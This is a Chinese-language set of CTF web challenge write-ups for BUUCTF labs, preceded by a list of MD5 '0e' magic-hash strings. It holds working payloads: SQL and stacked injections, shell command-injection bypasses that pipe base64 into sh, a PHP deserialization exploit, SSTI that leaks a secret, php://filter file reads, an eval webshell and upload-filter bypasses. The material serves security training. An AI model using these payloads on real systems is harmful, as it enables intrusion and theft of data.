hello2453151154:0e699828270766224167379051893230 hello2671160964:0e991314659725335977252965500812 hello3477156574:0e351869381366502712134558862779 hello3604940606:0e339703243496858659637178841304 hello3684340598:0e379962815375430180676055487647 hello3777842420:0e069131503592996704083669449098 hello3829645523:0e491115376538379914583803505526 hello3860468983:0e944498014881245171922637714771 hello3919876333:0e238954473242774066673182260621 hello4507888400:0e352301353053764000765589033360 hello4605444662:0e125787292128680471912637832157 hello4811388663:0e013747045260524485184037794915 hello4986053629:0e481204005586521649559409679900 hello5484151115:0e472189797727655093199339150672 hello5940758885:0e324620312086945257345832085592 hello6373592457:00e27029941820603345228601454319 hello6381543031:0e449824447122481665122660747248 hello6639974172:0e176089859050714805502433397456 hello7086860668:0e648874773746431631520736757720 hello7374388760:0e549064947501414644573642844626 hello7658019462:0e098815389405733553036135137403 hello7685375055:0e652150710039140728339196199010 hello8315902836:0e459343631065651364048523771633 hello8416618147:0e941242457321132837764267348274 hello8432644674:0e995949026043127195120779393623 hello8478436793:0e076622792501044716258916967463 hello9244594853:00e72957216100821023191573342510 hello9323512300:0e904310212375757042757551233487 hello9363131394:0e560411388484291716353637426222 hello9542774356:0e428258301000971183683390506375 0eRnJWi9XnKd9Z7x:0e623435437885705149665265323886 10209937038hello:0e751087553632951666954105945855 10657590124hello:0e412825784296994813673923046768 11372555763hello:0e033986194768180713959602159890 12046439106hello:0e086480164341626882924899142907 12658616286hello:0e331845474827674218000636146681 12803012125hello:0e743542551632021350623273288309 12832323351hello:0e107303994101791601610489605716 13494297451hello:0e871241942888840744154041163279 14922311682hello:00e90897696814423421503111013874 15669003106hello:0e057642476503058773682559259910 16001706719hello:0e434889771613853625195052101267 17424761499hello:0e360899786644122892711479288030 17566368381hello:0e068388224779546143336426711904 17715857190hello:0e821993049235653827748561923700 17789203077hello:0e363752286934748004267478332720 17985191625hello:0e710917156631142531976917685938 18087324632hello:0e218582682560037679432658764131 18172193956hello:0e197655911012583910606537789411 18300492070hello:0e791913724986920161109490945425 18334039264hello:0e901414916553612529150636179347 18454696015hello:00e36239940494820624886917103633 18827539334hello:0e708685749493051383997168720064 19021413300hello:0e286684064973701562754646189930 19146871622hello:0e911457360322005766446588406231 19374210165hello:0e021895121757290175000580073925 19857626471hello:0e247446874683380579709339779277 20043873956hello:0e353485834487835012843802093795 20722168628hello:0e440955275288620608351823343427 20939594552hello:0e776768690649094123168185279570 21045260537hello:0e503408782980464689452899992245 21985078371hello:00e99600087846922253588391363999 22105796210hello:0e704677955924781057083566761155 2PefxVf2JmrwxjDH:0e755309175686000342207575969583 7KvnOhF3vtmgcyge:0e067163562252210316413100043115 C0zcSWqwKEoWEAgk:0e373876668454513642191223584240 OvjvwiDH6z21j5Sw:0e480801274702183837296236500883 PB16DdlZwFLcGZkt:0e303732628701743861345481400946 VnKk0FwwuNOBdgxF:0e010133950146407417801169748688 W34mwVgBMxjTlefK:0e520891067050733616611692220497 WsDxECzeZtT3mLhW:0e725420191847615995846416099824 Y19PxQ8ibTgih84w:00e73400130860032588503590621328 YuLcwLYfhTO5sY5t:0e140024319784642702848046984729 ZUkMJPx7C8lMsrfq:0e771599882535532352154962129065 hello10474449125:0e474441707290900694930228433006 hello10672785079:0e859173238273273455651853557908 hello10890987208:0e175370484277394504384587260411 hello11797141519:0e732793752744629114494286417663 hello11858925934:0e617304905381053105798903298240 hello11946898529:0e742627851258428405240773858206 hello12214692295:0e892585293178019132096606038104 hello12560553820:0e597110581935218364198446515779 hello12598230177:0e668603196060723079925408295422 hello12843075495:0e839011002232277416984005143745 hello13125991246:0e914119447124053184837596602810 hello13167752025:0e558977309300052364660200559690 hello13334882644:0e316254807757583857349425586730 hello13407113867:0e288796248230952258217585561073 hello14062169111:0e049244235820395072512978352110 hello14377472903:0e392752400759036121301780363977 hello14542031811:0e993811297795641783927086214820 hello14549026960:0e228469762885608934453271169645 hello14695240931:0e809229513191992773750209262421 hello14711786334:0e015890930978824184417033457171 hello14813130399:0e918361104734546542049362421574 hello14916008992:0e466819090700704408768809355877 hello14943865304:0e488468752018350982728547761723 hello14998876620:0e703717133545667739210903323083 hello15041922164:0e049115676628046268387027519760 hello15108682064:0e748863568511001009100615283009 hello15253019448:0e316384599798704817278060496674 hello15396444514:0e118295099101694190498400868465 hello15474675991:0e922451586661705450371971984450 hello16082441020:00e95246441910436569610504494429 hello16220342703:0e704187673611855154964811990062 hello16339255101:00e58378298714355054522900730468 hello17023991779:0e698031537843159768162020780735 hello18656227376:0e685754512634902310450933716189 hello18783191515:0e732403697443088745177978608703 hello19088586243:0e911992123744915158360782778515 hello19168039924:0e642276872339101894040672638043 hello19195083900:0e674601908431368289110857474953 hello19793116672:0e811903033662824759764930345353 hello20713211437:0e977690635887290867676681639188 hello21259679978:0e547772458960324697116900050578 hello21333925385:0e670417101053731652248174312214 hello21576290701:0e088186168631173581624876059389 hello21625635498:0e803278139459070019409565297938 hello21960910191:0e494496613662122765707618390572 hello22131016813:00e89083858553525267218694193703 hello22355149941:00e66954822291536238327643342602 hello22407846698:0e688065097905052131160818049682 hello22462419833:0e150021313229535479448960192497 hello22524840741:0e427165560473709541262115879322 hello22684541754:0e212089178649039431933729688866 hello23311692247:0e875225739151635763781768168050 hello23482483937:0e151847567205329626226186994212 hello23919947361:0e554834940334311467473897130531 hello24034989169:0e220987314997743625442964283314 hello24343860700:0e070680132080871095604490841909 hello25957571388:0e505306610086634417027764698286 hello26790263335:0e781189643377847208451601226827 hello26903464651:0e914022345307317030885198241992 kFuiNituEBtYTL7s:00e98964689272988335938577613800 kZCLJqaExeldVpj0:0e656721453248642852483628066363 leEyBd5B7q3amjyG:0e394953505745405474013722050568 pumLyoapZAA9UDNG:00e97704981801156036802648235478 x3nHz0Tb1fId6UkI:0e389404952944040555093072566533 xqtlmRSdIANTlm1H:0e744254988746519482021441207857 zLnCfDklbnUmxqPX:0e584534642350465243534981705206 HFS_8z1+MWlaHRAH:00e75643634650030148510424537209 HFS_1+iq1ID4UnnU:0e735266984036051110930327520427 HFS_4HfzrCkFGXpw:0e646281365937497392704373659016 HFS_b+l93ZTnenaK:0e361812035730460151531645473846 HFS_StAqHq+DGI8d:0e111862011654913151517331666493 HFS_AxFzm23nYzeD:0e613355377549634251553032324836 HFS_0cIiLSiSswkh:00e66018400048726119673849053795 HFS_E0m8zzZKFT2R:00e13091337053035690315301170677 HFS_iWViAQ5MOc5g:00e26430923330343164204018649849 HFS_S73mdmL3numx:0e588371083636394650517986368324 HFS_9/rKCeq8tcY9:0e632684922796334502827808200584 .V;m=*]b?-:00e45653718969294213009554265803 egNJHP66&3E1:00e99757454497342716194968339146 KnCM6ogsNA1W:00e73414578113850089230341919829 &rh1ls6cl&G4:00e48890746054592674909531744787 0e215962017:0e291242476940776845150308577824
字符串汇总
第三步 绕过强类型比较
levell14.php
<?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){ echo $flag; }
数组绕过
MD5碰撞 Are there two known strings which have the same MD5 hash value?
Collisions for Hash Functions MD4, MD5, HAVAL-128 and RIPEMD
这部分我就不尝试了,感兴趣的朋友可以深入研究
[HCTF 2018]admin hint 首页,change页存在注释
<!-- you are not admin --> <!-- https://github.com/woadsl1234/hctf_flask/ -->
预期解 unicode同形字 参考资料 spotify历史漏洞-Creative usernames and Spotify account hijacking https://engineering.atspotify.com/2013/06/18/creative-usernames/
strlower 方法会将大写字母转化为小写 注意:上下标字母会被转化为对应同形字
routes.py 登录页 /login 和改密页 /change 都会执行 strlower 方法
unicode 字符标准化时会转变为对应的同形字
利用同形字 ᴬdmin 注册时会执行一次 strlower 方法,在 /change 页更改密码会再次执行 strlower 方法
ᴬ -> A -> a
这样就能实现 admin 登录
上下标字母查询表-Superscript and Subscript Letters
str.lower
非预期 flask session伪造 代码解密session
出处:PHITHON
#!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) decompress = False if payload.startswith(b'.'): payload = payload[1:] decompress = True try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of ' 'an exception') if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before ' 'decoding the payload') return session_json_serializer.loads(payload) if __name__ == '__main__': print(decryption(sys.argv[1].encode()))
flask-session-cookie-manager
config.py 中查得 SECRET_KEY=ckj123
试了好几次还是没出,好烦
正常情况
条件竞争 import requests import threading def login(s, username, password): data = {'username': username, 'password':password, 'submit': ''} return s.post("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/login", data=data) def logout(s): return s.get("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/logout") def change(s, newpassword): data = {'newpassword':newpassword } return s.post("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/change", data=data) def func1(s): login(s, 'master', 'master') change(s, 'ba2in9a') def func2(s): logout(s) res = login(s, 'admin', 'ba2in9a') if '<a href="/index">/index</a>' in res.text: print('finish') def main(): for i in range(9999): print(i) s = requests.Session() t1 = threading.Thread(target=func1, args=(s,)) t2 = threading.Thread(target=func2, args=(s,)) t1.start() t2.start() if __name__ == "__main__": main()
没有达到预期,放弃了
出题人ckj123的write up
Sky师傅一血的write up
graneed的write up
[极客大挑战 2019]BuyFlag /pay.php
<!-- ~~~post money and password~~~ if (isset($_POST['password'])) { $password = $_POST['password']; if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } } -->
cookie You must be a student from CUIT!!! Only Cuit’s students can buy the FLAG
将 Cookie: user=0 改为 1
you are Cuiter
松散比较 当 password == 404 时密码正确
PHP松散比较绕过
password=404flag
Password Right! Pay for the flag!!!hacker!!!
科学计数法或数组 Flag need your 100000000 money
money=1000000000
Nember lenth is too long
money=99999999
即当money的值小于100000000时
you have not enough money,loser~
money=1e9 / money[]=1
[护网杯 2018]easy_tornado hint /flag.txt /file?filename=/flag.txt&filehash=e772097775f523d08a70818acbcfa39e flag in /fllllllllllllag filename=/fllllllllllllag /welcome.txt /file?filename=/welcome.txt&filehash=df5cb6a70865f967cc4f829f0bfdb80f
render
SSTI
轻量级 WEB 框架 Tornado(python)调用 render 方法生成 template ,
/file?filename=/hints.txt&filehash=4954f0b53a5bcfe596332cc9f4a3c8e7
/hints.txt md5(cookie_secret+md5(filename))
指出如何生成 filehash 的值
重点在获取 cookie_secret 的值
cookie_secret 是 handler.application.settings 的键值。
handler -> RequestHandler
RequestHandler.settings -> self.application.settings
handler.settings -> handler.application.settings
可以直接通过 handler.settings 访问到 cookie_secret
/error?msg={{handler.settings}} {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'cba73db5-9b2f-4f78-a0c1-577900cda7d6'}
md5 生成 filehash
服务器端模板注入(SSTI)专题
一篇文章带你理解漏洞之 SSTI 漏洞
Authentication and security
RequestHandler.settings
Template syntax - handler
[ACTF2020 新生赛]BackupFile 扫目录
/index.php.bak
<?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"; if($key == $str) { echo $flag; } } else { echo "Try to find out source file!"; } ?>
PHP松散比较
Payload ?key=123
[极客大挑战 2019]BabySQL ?username=admin&password=-1' or 1=1 #
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1=1 #’’ at line 1
过滤了相应关键字,双写可实现绕过
?username=admin&password=-1' oorr 1=1 #
Hello admin! Your password is ‘b57c0551628355fa5a8a3e247f810f7e’
?username=admin&password=-1' uniunionon selselectect 1,2,3 #
Hello 2! Your password is ‘3’
?username=admin&password=-1' uniunionon selselectect 1,version(),database() #
Hello 10.3.18-MariaDB! Your password is ‘geek’
?username=admin&password=-1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #
Hello b4bsql,geekuser!
?username=admin&password=-1' uniunionon selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #
Hello id,username,password!
?username=admin&password=-1' uniunionon selselectect 1,group_concat(id,username,passwoorrd),3 frfromom b4bsql #
Hello 1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{792d2355-89eb-4b4e-b89a-96437b387278}!
[极客大挑战 2019]PHP 扫出来个 www.zip
给了相关源码
/index.php
<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>
PHP反序列化
/class.php
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can't give you the flag!"; die(); } } } ?>
unserialize 会检查是否存在 __wakeup 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源
这里需要绕过 __wakeup 方法
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过 __wakeup 的执行
__wakeup()函数漏洞以及实际漏洞分析
Exploit <?php class Name { private $username = 'admin'; private $password = '100'; } $a = new Name(); echo serialize($a); ?>
序列化
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
Payload ?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
[RoarCTF 2019]Easy Calc /index.html
$('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#result").html(`<div class="alert alert-success"> <strong>答案:</strong>${data} </div>`); }, error:function(){ alert("这啥?算不来!"); } }) return false; })
/calc.php
<?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } eval('echo '.$str.';'); } ?>
calc.php?%20num=phpinfo()
PHP字符串解析函数绕过 Abusing PHP query string parser to bypass IDS, IPS, and WAF
calc.php?%20num=var_dump(scandir(chr(47)))
calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
[极客大挑战 2019]LoveSQL ?username=admin&password=-1%27+or+1%3D1+%23
hint Your password is ‘50753b5b26e65cbcdfab97b0e4569841’
md5 解密就不用想了,继续尝试
尝试联合注入 判断字段数 ?username=admin&password=-1' order by 1,2,3,4 #
Unknown column ‘4’ in ‘order clause’
有三个字段
?username=admin&password=-1' union select 1,2,3 #
查看数据库基础信息 ?username=admin&password=-1' union select 1,@@version_compile_os,version() #
?username=admin&password=-1' union select 1,user(),database() #
Linux,10.3.18-MariaDB,root@localhost,geek
查表 url?username=admin&password=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek' #
Hello geekuser,l0ve1ysq1!
查字段 ?username=admin&password=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1' #
Hello id,username,password!
查数据 ?username=admin&password=-1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1 #
Hello 1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{b1305613-af15-4561-b1c0-8ba3f2d4b04f}!
[强网杯 2019]随便注 源码 <?php function waf1($inject) { preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);'); } function waf2($inject) { strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")'); } if(isset($_GET['inject'])) { $id = $_GET['inject']; waf1($id); waf2($id); $mysqli = new mysqli("127.0.0.1","root","root","supersqli"); $sql = "select * from `words` where id = '$id';"; $res = $mysqli->multi_query($sql); if ($res){ do{ if ($rs = $mysqli->store_result()){ while ($row = $rs->fetch_row()){ var_dump($row); echo "<br>"; } $rs->Close(); if ($mysqli->more_results()){ echo "<hr>"; } } }while($mysqli->next_result()); } else { echo "error ".$mysqli->errno." : ".$mysqli->error; } $mysqli->close(); } ?>
联合注入
error 1054 : Unknown column ‘3’ in ‘order clause’
hint return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);
堆叠注入
array(1) { [0]=> string(16) “1919810931114514” }
array(1) { [0]=> string(5) “words” }
-1';desc `1919810931114514`#
array(6) { [0]=> string(4) “flag” [1]=> string(12) “varchar(100)” [2]=> string(2) “NO” [3]=> string(0) “” [4]=> NULL [5]=> string(0) “” }
预处理语句绕过 -1';prepare zero from concat('sel','ect * from `1919810931114514`');execute zero;#
-1';prepare zero from concat(char(115,101,108,101,99,116),' * from `1919810931114514`');execute zero;#
strstr($inject, “set”) && strstr($inject, “prepare”)
-1';SET @sqli=concat('sel','ect * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#
-1';SET @sqli=concat(char(115,101,108,101,99,116),' * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#
替换表名列名 -1'; alter table words rename to others;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
[GXYCTF2019]Ping Ping Ping 目录下有两个文件
flag.php
index.php
空格、flag 存在过滤,无法直接查看
/?ip=1.1.1.1|cat$IFS$1index.php
<?php if(isset($_GET['ip'])){ $ip = $_GET['ip']; if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else if(preg_match("/bash/", $ip)){ die("fxck your bash!"); } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("fxck your flag!"); } $a = shell_exec("ping -c 4 ".$ip); echo "<pre>"; print_r($a); } ?>
变量替换 通过变量 a 实现字符替换
/?ip=1.1.1.1|a=g;cat$IFS$9fla$a.php
内联执行 将反引号内命令的输出作为输入执行
/?ip=1.1.1.1|cat$IFS$9`ls`
编码绕过 /?ip=1.1.1.1|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh
Linux 下存在多种 Shell 程序,选择可用 Shell 即可
内部域分隔符 IFS(Internal Field Separator) Linux 的 env 变量,bash shell 下默认为空格、制表符和换行符
[ACTF2020 新生赛]Exec 1.1.1.1;cat /flag
[ACTF2020 新生赛]Upload /index.php
<?php error_reporting(0); define("UPLOAD_PATH", "./uplo4d"); $msg = "Upload Success!"; if (isset($_POST['submit'])) { $temp_file = $_FILES['upload_file']['tmp_name']; $file_name = $_FILES['upload_file']['name']; $ext = pathinfo($file_name,PATHINFO_EXTENSION); if(in_array($ext, ['php', 'php3', 'php4', 'php5'])) { exit('nonono~ Bad file!'); } $new_file_name = md5($file_name).".".$ext; $img_path = UPLOAD_PATH . '/' . $new_file_name; if (move_uploaded_file($temp_file, $img_path)){ $is_upload = true; } else { $msg = 'Upload Failed!'; } echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>"; } ?>
main.js
function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".webp|.webp|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")); //判断上传文件类型是否允许上传 if (allow_ext.indexOf(ext_name) == -1) { var errMsg = "该文件不允许上传,请上传jpg、png、gif结尾的图片噢!"; alert(errMsg); return false; } }
绕过相应检测
[极客大挑战 2019]Upload upload_file.php
<?php $file = $_FILES["file"]; // 允许上传的图片后缀 $allowedExts = array("php","php2","php3","php4","php5","pht","phtm"); $temp = explode(".", $file["name"]); $extension = strtolower(end($temp)); $image_type = @exif_imagetype($file["tmp_name"]); if ((($file["type"] == "image/gif") || ($file["type"] == "image/jpeg") || ($file["type"] == "image/jpg") || ($file["type"] == "image/pjpeg") || ($file["type"] == "image/x-png") || ($file["type"] == "image/png")) &&$file["size"] < 20480) { if ($file["error"] > 0){ echo "ERROR!!!"; } elseif (in_array($extension, $allowedExts)) { echo "NOT!".$extension."!"; } elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) { echo "NO! HACKER! your file included '<?'"; } elseif (!$image_type) { echo "Don't lie to me, it's not image at all!!!"; } else{ $fileName='./upload/'.$file['name']; move_uploaded_file($file['tmp_name'],$fileName); echo "上传文件名: " . $file["name"] . "<br>"; } } else { echo "Not image!"; } ?>
需绕过复合检测 文件后缀名黑名单检测
文件类型 php 函数检测
文件大小检测
<? php 特征检测
最后将合法文件移动至 upload 目录下
可用 ASPX 一句话,后缀为 phtml ,文件头修改为 GIF89a?
上传时将 Content-Type 参数改为 image/jpeg
[极客大挑战 2019]Knife /index.php
<?php eval($_POST["Syc"]); ?>
一句话木马,通过蚁剑连接
[极客大挑战 2019]Secret File <a id="master" href="./Archive_room.php" xxx</a>
跳转至 Archive_room.php
<a id="master" href="./action.php" xxx</a>
302 重定向至 end.php
Burp 拦截
/secr3t.php
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag放在了flag.php里 ?> </html>
php://filter 获取源码
flag and secr3t
[ACTF2020 新生赛]Include hint Can you find out the flag?
?file=flag.php
PHP 伪协议 php://filter
?file=php://filter/read=convert.base64-encode/resource=flag.php
[SUCTF 2019]EasySQL var_dump 回显格式反推出使用 var_dump 实现输出
拿字典跑了下,屏蔽了某些关键词
堆叠注入
query=-1; show columns from Flag #
from 被过滤,不可行
参考资料 BUUCTF—web题解法汇总-UCASZ https://ucasers.cn/buuctf-web%E9%A2%98%E8%A7%A3%E6%B3%95%E6%B1%87%E6%80%BB/#title-3
$sql = "select ".$post['query']."||flag from Flag";
1;set sql_mode=PIPES_AS_CONCAT;select 1
[极客大挑战 2019]EasySQL /check.php?username=admin&password=%27+or+1%3D1
/check.php?username=admin&password=%27+or+1%3D1+%23
[极客大挑战 2019]Http
href=”Secret.php”
It doesn’t come from ‘https://Sycsecret.buuoj.cn ‘
HTTP Header 详解
Referer: https://Sycsecret.buuoj.cn
Please use “Syclover” browser
No!!! you can only read this locally!!!
[极客大挑战 2019]Havefun <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } -->
?cat=dog
[HCTF 2018]WarmUp
/source.php
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.webp\" />"; } ?>
hint /hint.php
flag not here, and flag in ffffllllaaaagggg
?file=hint.php?../../../../../ffffllllaaaagggg